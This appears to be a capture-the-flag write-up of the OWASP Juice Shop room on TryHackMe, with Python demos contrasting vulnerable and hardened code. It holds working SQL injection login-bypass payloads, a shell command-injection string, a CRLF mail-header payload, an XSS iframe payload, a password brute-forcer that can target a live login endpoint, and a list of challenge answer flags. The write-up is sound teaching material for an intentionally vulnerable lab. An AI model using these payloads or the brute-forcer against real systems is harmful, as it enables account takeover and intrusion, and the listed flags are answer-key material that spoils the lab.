Introduction
This post covers the broken authentication and SQL injection walkthroughs from the OWASP Juice Shop room on TryHackMe, and recaps the OWASP Top 10 vulnerability classes the room exercises. You will find these in all types of web applications, but for today we will be looking at OWASP's own deliberately vulnerable application, Juice Shop.
Vulnerabilities Covered
Injection vulnerabilities are dangerous to a company because they can cause downtime and/or loss of data. Identifying injection points within a web application is usually quite simple, as most of them return an error when they are fed malformed input. SQL Injection is when an attacker submits a malicious or malformed query fragment that the application concatenates into a database query, letting the attacker retrieve or tamper with data and, in some cases, log into accounts. Command Injection is when a web application takes user-controlled input and runs it as part of a system command; an attacker can tamper with that input to execute their own commands. This is commonly seen in applications that perform a ping test on a user-supplied host. Email injection is a vulnerability that lets a malicious user send email messages without prior authorisation by the email server. It occurs when the attacker adds extra data (such as a line break followed by a new header field) to form fields that the server does not interpret correctly.
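The two non-SQL injection classes above, as an added example that is not code from the original post or from Juice Shop: a hypothetical ping wrapper that hands user input to a shell, a contact-form header builder that trusts its fields, and the hardened form of each. echo stands in for ping so the block runs offline, and every host, address and payload in it is constructed for the demo.

```python
import ipaddress
import subprocess


def ping_vulnerable(host: str) -> str:
    """Hypothetical ping wrapper with the bug: the host is pasted into a shell
    command line, so shell metacharacters in it are honoured by /bin/sh."""
    cmd = f"echo pinging {host}"  # echo stands in for ping so this runs offline
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_hardened(host: str) -> str:
    """Same feature, fixed: validate the value and pass it as one argv element
    with no shell in between."""
    ipaddress.ip_address(host)  # ValueError unless host is an IPv4/IPv6 literal
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


def build_headers_vulnerable(sender: str, subject: str) -> str:
    """Mail headers built straight from a contact form: a CRLF in either field
    starts a new header line that the mail server will honour."""
    return f"From: {sender}\r\nSubject: {subject}\r\n"


def build_headers_hardened(sender: str, subject: str) -> str:
    """Reject any field containing a line break before it reaches the headers."""
    for value in (sender, subject):
        if "\r" in value or "\n" in value:
            raise ValueError("line break in mail header field")
    return f"From: {sender}\r\nSubject: {subject}\r\n"


def header_names(raw: str) -> list:
    """The header names a mail server would parse out of a raw header block."""
    return [line.split(":", 1)[0] for line in raw.split("\r\n") if ":" in line]


def rejects(fn, *args) -> bool:
    """True if fn refuses the input, which is what the hardened versions should do."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    host = "127.0.0.1; echo INJECTED"  # constructed payload for the ping form
    print(ping_vulnerable(host), end="")  # the second command runs: INJECTED appears
    print(rejects(ping_hardened, host))  # True: not an IP literal, never reaches a shell
    subj = "Hello\r\nBcc: everyone@example.test"  # constructed payload for the form
    print(header_names(build_headers_vulnerable("me@example.test", subj)))  # Bcc appears
    print(rejects(build_headers_hardened, "me@example.test", subj))  # True
```

The fix is the same in both cases: validate the value against what it is supposed to be (an IP literal, a single header line) and never let it reach an interpreter that assigns meaning to its metacharacters.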
A web application should store and transmit sensitive data safely and securely, but in some cases the developer does not protect it correctly, leaving it exposed. Most of the time data protection is not applied consistently across the application, leaving certain pages or files accessible to the public. At other times information is leaked without the developer's knowledge, which also leaves the application open to attack.
Modern systems allow multiple users to have access to different pages. Administrators most commonly use an administration page to edit, add and remove elements of a website; you might use one of these when building a site with a service such as Weebly or Wix. When a Broken Access Control bug is found, it is categorised as one of two types: Horizontal Privilege Escalation, which occurs when a user can perform an action or access data belonging to another user with the same level of permissions, and Vertical Privilege Escalation, which occurs when a user can perform an action or access data that requires a higher level of permissions.
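Both escalation types, as an added example that is not code from the post or from Juice Shop: an in-memory model of a shop with per-user baskets and an administration page, each access path shown without the ownership or role check and then with it. The users, roles, basket ids and contents are constructed for the demo; only the admin email comes from the room.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    id: int
    email: str
    role: str  # "customer" or "admin"


@dataclass
class Basket:
    id: int
    owner_id: int
    items: list = field(default_factory=list)


# Constructed data: one admin (email from the room) and two customers.
USERS = {
    1: User(1, "admin@juice-sh.op", "admin"),
    2: User(2, "alice@example.test", "customer"),
    3: User(3, "bob@example.test", "customer"),
}
BASKETS = {
    10: Basket(10, owner_id=2, items=["apple juice"]),
    11: Basket(11, owner_id=3, items=["lemon juice"]),
}


class Forbidden(Exception):
    """Raised by the hardened handlers when the session user may not proceed."""


# Horizontal privilege escalation: the basket id comes from the request and
# nothing ties it back to the logged-in user, so any customer can read any basket.
def get_basket_vulnerable(session_user: User, basket_id: int) -> Basket:
    return BASKETS[basket_id]


def get_basket_hardened(session_user: User, basket_id: int) -> Basket:
    basket = BASKETS[basket_id]
    if basket.owner_id != session_user.id and session_user.role != "admin":
        raise Forbidden(f"user {session_user.id} does not own basket {basket_id}")
    return basket


# Vertical privilege escalation: the admin route exists and nobody checks the role,
# so knowing (or guessing) the path is enough to reach it.
def admin_page_vulnerable(session_user: User) -> str:
    return "administration page"


def admin_page_hardened(session_user: User) -> str:
    if session_user.role != "admin":
        raise Forbidden("admin role required")
    return "administration page"


def allowed(fn, *args) -> bool:
    """True if the handler serves the request, False if it refuses it."""
    try:
        fn(*args)
    except Forbidden:
        return False
    return True


if __name__ == "__main__":
    alice = USERS[2]
    print(allowed(get_basket_vulnerable, alice, 11))  # True: Bob's basket leaks
    print(allowed(get_basket_hardened, alice, 11))    # False: ownership enforced
    print(allowed(admin_page_vulnerable, alice))      # True: hidden path, no check
    print(allowed(admin_page_hardened, alice))        # False: role enforced
```

The check belongs on the server for every request, keyed off the authenticated session rather than anything the client sends; hiding the link to the admin page or using unguessable basket ids is not a substitute.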
XSS, or Cross-site Scripting, is a vulnerability that allows attackers to run JavaScript in a victim's browser in the context of the web application. It is one of the most commonly found bugs in web applications. Its complexity ranges from easy to extremely hard, as each web application parses input in a different way. There are three major types of XSS attack. DOM XSS (Document Object Model-based Cross-site Scripting) occurs when client-side JavaScript writes attacker-controlled data, for example part of the URL, into the page, so the payload executes without the server ever handling it; this type of attack commonly injects HTML such as a <script></script> tag. Persistent (stored) XSS is JavaScript that the server stores and later serves back inside a page, so it runs for every visitor; it occurs when the server does not sanitise user data before storing it and is commonly found in blog posts and product reviews. Reflected XSS is JavaScript supplied in a request, typically a URL parameter, that the server echoes straight back in its response; it is most commonly found when the server does not sanitise search data.
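Reflected and persistent XSS as a rendering failure, in an added example that is not code from the post or from Juice Shop: a search page that echoes the q parameter and a reviews page that prints stored reviews, each built by string concatenation and then with output encoding. DOM XSS is the same mistake made in browser JavaScript (writing untrusted data into innerHTML) and cannot run here, but the payload and the escaping fix are the same. The templates, reviews and payload are constructed for the demo.

```python
import html

# Constructed test payload: survives as markup if the page does not encode output.
XSS_PAYLOAD = '<iframe src="javascript:alert(`xss`)">'


# Reflected: the search term from ?q= is echoed into the results page.
def search_page_vulnerable(q: str) -> str:
    return f"<h1>Search results for: {q}</h1>"


def search_page_hardened(q: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser renders text,
    # not a new element.
    return f"<h1>Search results for: {html.escape(q)}</h1>"


# Persistent: reviews are stored as submitted and shown to every later visitor.
def render_reviews_vulnerable(reviews: list) -> str:
    return "".join(f"<p>{r}</p>" for r in reviews)


def render_reviews_hardened(reviews: list) -> str:
    # Encode at output time; encoding at storage time alone breaks other
    # consumers of the data (APIs, exports) and is easy to forget.
    return "".join(f"<p>{html.escape(r)}</p>" for r in reviews)


def contains_live_markup(page: str, payload: str) -> bool:
    """True if the payload reached the page byte-for-byte, i.e. as markup."""
    return payload in page


if __name__ == "__main__":
    print(search_page_vulnerable(XSS_PAYLOAD))   # iframe lands in the page
    print(search_page_hardened(XSS_PAYLOAD))     # &lt;iframe ...&gt; is shown as text
    stored = ["Great juice!", XSS_PAYLOAD]       # constructed review store
    print(contains_live_markup(render_reviews_vulnerable(stored), XSS_PAYLOAD))  # True
    print(contains_live_markup(render_reviews_hardened(stored), XSS_PAYLOAD))    # False
```

contains_live_markup is the same check you make by hand in the browser: view the response source and see whether your payload came back encoded or as an element.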
Task 1 – SQL Injection:
- The first task involves exploiting SQL injection to log in as the admin user. SQL injection bypasses authentication by injecting a payload that changes the logic of the query the login form builds. Entering a payload like "' OR 1=1--" in the email field closes the string, makes the WHERE clause always true and comments out the rest of the query (including the password check), so the query returns the first user in the table, which is the administrator. This demonstrates how weak input validation can be exploited in insecure applications.
Task 2 – Logging in as a Vendor:
- After logging out of the admin account, the next objective is to log in as a vendor (the Bender account). The process is similar: the target's email address followed by "'--" is entered in the email field, so the password check is commented out and the query matches that specific user. This shows how a basic SQL injection can be aimed at a chosen account once the injection point is confirmed.
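Tasks 1 and 2 together, as an added example that is not code from the post or from Juice Shop: an in-memory SQLite users table, a login function that concatenates the email field into its query (the bug both tasks exploit), and the parameterised query that stops both payloads. The admin email is the one from the room; the other emails, the passwords and the hash choice are constructed for the demo.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table; the first row is the administrator."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, "
               "email TEXT, password TEXT, role TEXT)")
    rows = [
        ("admin@juice-sh.op", "demo-pass-1", "admin"),      # email from the room
        ("jim@juice-sh.op", "demo-pass-2", "customer"),     # constructed
        ("bender@juice-sh.op", "demo-pass-3", "customer"),  # constructed
    ]
    for email, pw, role in rows:
        db.execute("INSERT INTO Users (email, password, role) VALUES (?, ?, ?)",
                   (email, hashlib.sha256(pw.encode()).hexdigest(), role))
    return db


def login_vulnerable(db: sqlite3.Connection, email: str, password: str):
    """The bug: the email field is pasted into the SQL text, so quotes and
    comment markers in it become part of the query."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = (f"SELECT id, email, role FROM Users "
           f"WHERE email = '{email}' AND password = '{pw_hash}'")
    return db.execute(sql).fetchone()


def login_hardened(db: sqlite3.Connection, email: str, password: str):
    """Bound parameters: the driver sends the values separately from the SQL,
    so nothing in the email field can change the query's structure."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return db.execute("SELECT id, email, role FROM Users "
                      "WHERE email = ? AND password = ?", (email, pw_hash)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Task 1: always-true condition, rest of the query commented out -> first row.
    print(login_vulnerable(db, "' OR 1=1--", "anything"))
    # Task 2: close the string after a chosen email, comment out the password check.
    print(login_vulnerable(db, "bender@juice-sh.op'--", "anything"))
    # Same payloads against the parameterised query: no match.
    print(login_hardened(db, "' OR 1=1--", "anything"))
    print(login_hardened(db, "bender@juice-sh.op'--", "anything"))
```

The effective query in Task 1 is `... WHERE email = '' OR 1=1--' AND password = '...'`; everything after `--` is a comment, so the database returns the first matching row and the application treats that row as the logged-in user.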
Task 3 – Brute-forcing the Admin Password:
- The next challenge is to guess the admin password through brute force. Using a tool such as Burp Suite's Intruder, a common-password wordlist is loaded into the password position of the captured login request and the attempts are automated; the correct password stands out by its HTTP status code (200 for a successful login, an error code for every failed attempt). The password identified is then used to log in.
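A scripted equivalent of the Intruder run, as an added example that is not code from the post: brute_force() tries each candidate against an attempt function and stops at the first HTTP 200. mock_login() is a local stand-in for the target so the block runs offline; its wordlist, email and password are constructed. http_login() builds the same attempt against a live instance and assumes the login form posts JSON to /rest/user/login (confirm the route and body in Burp's proxy history before relying on it).

```python
import hashlib
import json
import urllib.error
import urllib.request

# Constructed wordlist; a real run would load rockyou or a similar list.
WORDLIST = ["123456", "password", "qwerty", "letmein", "juice-demo", "admin1"]

_TARGET_EMAIL = "admin@juice-sh.op"
_TARGET_HASH = hashlib.sha256(b"juice-demo").hexdigest()  # constructed secret


def mock_login(email: str, password: str) -> int:
    """Offline stand-in for the login endpoint: 200 on success, 401 otherwise."""
    if (email == _TARGET_EMAIL
            and hashlib.sha256(password.encode()).hexdigest() == _TARGET_HASH):
        return 200
    return 401


def http_login(base_url: str):
    """Return an attempt function that posts to a running instance.
    Assumes a JSON login body at /rest/user/login; not exercised offline."""
    def attempt(email: str, password: str) -> int:
        body = json.dumps({"email": email, "password": password}).encode()
        req = urllib.request.Request(f"{base_url}/rest/user/login", data=body,
                                     headers={"Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code  # failed logins come back as an error status
    return attempt


def brute_force(attempt, email: str, wordlist: list):
    """Try each candidate in order; return (password, attempts_used) on the
    first 200, or (None, attempts_used) if the list is exhausted."""
    for n, candidate in enumerate(wordlist, start=1):
        if attempt(email, candidate) == 200:
            return candidate, n
    return None, len(wordlist)


if __name__ == "__main__":
    print(brute_force(mock_login, _TARGET_EMAIL, WORDLIST))  # ('juice-demo', 5)
    # Against a live target (authorised testing only):
    # print(brute_force(http_login("http://10.10.10.10:3000"), _TARGET_EMAIL, WORDLIST))
```

The status code is the same oracle Intruder sorts on; if the application returned 200 for every attempt and signalled failure in the body, the check would have to match on the response text instead.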
Task 4 – Resetting Passwords via Weak Security Questions:
- The final task involves exploiting the password reset mechanism. Jim's account uses a common security question ("What is your eldest sibling's middle name?"), and with contextual hints from the scenario (Jim's review references Star Trek, pointing to James T. Kirk, whose elder brother is George Samuel Kirk) the answer is deduced to be "Samuel". This demonstrates how easily security questions can be defeated with minimal research or social engineering.
Challenge Answers
Reconnaissance
Question #1: What’s the Administrator’s email address?
admin@juice-sh.op
Question #2: What parameter is used for searching?
q
Question #3: What show does Jim reference in his review?
Star Trek
Injection
Question #1: Log into the administrator account!
32a5e0f21372bcc1000a6088b93b458e41f0e02a
Question #2: Log into the Bender account!
fb364762a3c102b2db932069c0e6b78e738d4066
Broken Authentication
Question #1: Bruteforce the Administrator account’s password!
c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
Question #2: Reset Jim’s password!
094fbc9b48e525150ba97d05b942bbf114987257
Sensitive Data Exposure
Question #1: Access the Confidential Document!
edf9281222395a1c5fee9b89e32175f1ccf50c5b
Question #2: Log into MC SafeSearch’s account!
66bdcffad9e698fd534003fbb3cc7e2b7b55d7f0
Question #3: Download the Backup file!
bfc1e6b4a16579e85e06fee4c36ff8c02fb13795
Broken Access Control
Question #1: Access the administration page!
946a799363226a24822008503f5d1324536629a0
Question #2: View another user’s shopping basket!
41b997a36cc33fbe4f0ba018474e19ae5ce52121
Question #3: Remove all 5-star reviews!
50c97bcce0b895e446d61c83a21df371ac2266ef
Cross-site Scripting (XSS)
Question #1: Perform a DOM XSS!
9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf
Question #2: Perform a persistent XSS!
149aa8ce13d7a4a8a931472308e269c94dc5f156
Question #3: Perform a reflected XSS!
23cefee1527bde039295b2616eeb29e1edc660a0
Score Board
Access the /#/score-board/ page
7efd3174f9dd5baa03a7882027f2824d2f72d86e
Video Walkthrough(s)